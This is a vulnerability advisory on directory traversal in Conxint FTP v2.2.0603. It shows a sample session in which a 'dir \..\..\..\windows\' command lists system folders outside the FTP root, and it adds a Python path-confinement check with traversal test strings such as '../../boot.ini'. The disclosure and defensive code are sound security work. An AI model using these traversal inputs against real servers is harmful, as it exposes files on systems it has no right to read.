"Conxint FTP server provides FTP service on Windows 98/2000/2003/ME/XP operating systems. You can use it as a general FTP site server, or share files with other users as a file server."
Conxint FTP v2.2.0603 and earlier versions are vulnerable to directory traversal via the MKD, DIR and GET commands.
Credit:
The information has been provided by: Greg Linares.
Description:
Conxint FTP v2.2.0603 and earlier versions are vulnerable to directory traversal via the MKD, DIR and GET commands.
The flaw exposes file listings of the host computer outside the FTP root directory. It also allows remote users, even unauthenticated anonymous users, to retrieve any file on the webserver.
220 Conxint ftp server ready!
ftp> dir \..\..\..\windows\
200 PORT Command successful.
125 Opening ASCII mode data connection for /bin/ls.
total 0
-rw-rw-r-- 1 root root 0 Aug 09 10:45 .tmp
drw-rw-r-- 1 root root 512 Oct 13 00:35 $hf_mig$
drw-rw-r-- 1 root root 512 Jun 24 03:02 $MSI31Uninstall_KB893803v2$
drw-rw-r-- 1 root root 512 Jun 25 03:17 $NtUninstallKB873339$
drw-rw-r-- 1 root root 512 Jun 25 03:22 $NtUninstallKB885835$
drw-rw-r-- 1 root root 512 Jun 25 03:21 $NtUninstallKB885836$
drw-rw-r-- 1 root root 512 Jun 25 03:09 $NtUninstallKB885884$
drw-rw-r-- 1 root root 512 Jun 25 03:09 $NtUninstallKB886185$
drw-rw-r-- 1 root root 512 Jun 25 03:16 $NtUninstallKB887742$
drw-rw-r-- 1 root root 512 Jun 25 03:16 $NtUninstallKB888113$
drw-rw-r-- 1 root root 512 Jun 25 03:10 $NtUninstallKB888302$
drw-rw-r-- 1 root root 512 Jun 25 03:12 $NtUninstallKB890046$
drw-rw-r-- 1 root root 512 Jun 25 03:01 $NtUninstallKB890859$
drw-rw-r-- 1 root root 512 Jun 25 03:14 $NtUninstallKB891781$
...... ETC
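
The confinement check an FTP server needs before acting on a DIR, MKD or GET argument, as an added example that is not from the advisory and is not Conxint's code. FTP_ROOT, resolve_in_root, audit and the sample arguments are assumptions made for illustration; ntpath is used so Windows path rules apply on any platform.

```python
import ntpath

FTP_ROOT = r"C:\ftproot"  # hypothetical FTP root, not taken from the advisory


class PathEscape(Exception):
    """Raised when a client-supplied path resolves outside the FTP root."""


def resolve_in_root(root, cwd, arg):
    """Map a DIR/MKD/GET argument to a local path confined to root.

    root: local directory served as "/"; cwd: client's virtual directory.
    """
    # Windows accepts both separators, so fold "/" into "\" before checking.
    virtual = arg.replace("/", "\\")
    if ":" in virtual or "\0" in virtual:
        # Drive letters, alternate data streams and embedded NULs are refused.
        raise PathEscape(arg)
    if virtual.startswith("\\"):
        rel = virtual.lstrip("\\")  # absolute virtual path: relative to root
    else:
        rel = ntpath.join(cwd.replace("/", "\\").lstrip("\\"), virtual)
    # normpath collapses ".." segments; compare only after that has happened.
    candidate = ntpath.normpath(ntpath.join(root, rel))
    root_norm = ntpath.normcase(ntpath.normpath(root))
    cand_norm = ntpath.normcase(candidate)
    # The trailing separator stops C:\ftproot2 from passing as C:\ftproot.
    if cand_norm != root_norm and not cand_norm.startswith(root_norm + "\\"):
        raise PathEscape(arg)
    return candidate


# Constructed sample arguments; the first is the one shown in the session above.
SAMPLES = ["\\..\\..\\..\\windows\\", "pub/readme.txt",
           "../../boot.ini", "..\\ftproot2\\x"]


def audit(args, cwd="/"):
    """Return (argument, resolved path or None if rejected) for each argument."""
    results = []
    for a in args:
        try:
            results.append((a, resolve_in_root(FTP_ROOT, cwd, a)))
        except PathEscape:
            results.append((a, None))
    return results
```

The check is purely lexical: it does not resolve junctions, symlinks or 8.3 short names, which a server must handle separately when opening the file.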